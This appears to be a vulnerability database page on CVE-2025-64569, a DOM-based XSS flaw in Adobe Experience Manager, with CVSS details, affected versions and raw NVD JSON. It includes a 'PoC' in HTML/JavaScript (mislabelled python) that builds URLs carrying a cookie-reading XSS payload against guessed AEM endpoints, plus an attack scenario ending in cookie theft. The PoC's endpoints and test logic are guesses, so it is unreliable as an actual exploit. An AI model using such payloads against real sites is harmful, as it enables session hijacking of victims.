Security Vulnerability Report
中文
CVE-2025-64569 CVSS 5.4 MEDIUM

CVE-2025-64569

Published: 2025-12-10 19:16:20
Last Modified: 2025-12-12 19:55:22

Description

Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:* - VULNERABLE
Adobe Experience Manager 6.5.23及更早版本
Adobe Experience Manager 6.5.x所有版本(<=6.5.23)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-64569 DOM-based XSS PoC for Adobe Experience Manager --> <!-- This PoC demonstrates how an attacker could exploit the DOM XSS vulnerability --> <!-- Modify the target URL and payload as needed for testing --> <!DOCTYPE html> <html> <head> <title>CVE-2025-64569 PoC</title> </head> <body> <h1>DOM-based XSS PoC for Adobe Experience Manager</h1> <p>Target URL Pattern:</p> <code id="urlPattern"></code> <script> // Configuration const targetBase = 'https://vulnerable-aem-instance.com'; const maliciousPayload = '<img src=x onerror="alert(document.cookie)">'; // Construct malicious URL // Common AEM endpoints that may be vulnerable const endpoints = [ '/content/dam/en.form.html', '/bin/querybuilder.json', '/libs/granite/core/content/login.html', '/apps/.../render.json' ]; // Inject payload into common parameter names const vulnerableParams = ['text', 'query', 'name', 'filter', 'path']; // Generate PoC URLs let pocUrls = []; endpoints.forEach(endpoint => { vulnerableParams.forEach(param => { const url = `${targetBase}${endpoint}?${param}=${encodeURIComponent(maliciousPayload)}`; pocUrls.push(url); }); }); // Display generated URLs document.getElementById('urlPattern').innerHTML = pocUrls.join('<br>'); // Automated test function function testXSS(url) { // Simulate page rendering with user input const userInput = new URL(url).searchParams.get(Object.keys( Object.fromEntries(new URL(url).searchParams) )[0]); // Vulnerable code pattern (what AEM might be doing) // document.getElementById('output').innerHTML = userInput; // If userInput contains malicious payload, XSS occurs console.log('Testing URL:', url); return userInput; } // Display results console.log('Generated PoC URLs for testing'); </script> <h2>Attack Scenario</h2> <ol> <li>Attacker identifies vulnerable AEM endpoint</li> <li>Attacker crafts malicious URL with XSS payload</li> <li>Victim clicks the link (via phishing or social engineering)</li> <li>AEM page renders user input without proper sanitization</li> <li>Malicious script executes in victim's browser context</li> <li>Attacker steals session cookies or performs actions as victim</li> </ol> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64569", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:20.023", "lastModified": "2025-12-12T19:55:22.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.24.0", "matchCriteriaId": "0FC0CE20-2AC2-45FB-A7CF-9ADEEBC8B411"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*", "versionEndExcluding": "2025.12.0", "matchCriteriaId": "3326AB8A-7DF7-437C-86B6-58BA768E42E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*", "matchCriteriaId": "852C2582-859F-40DB-96CF-E1274CEECC1F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}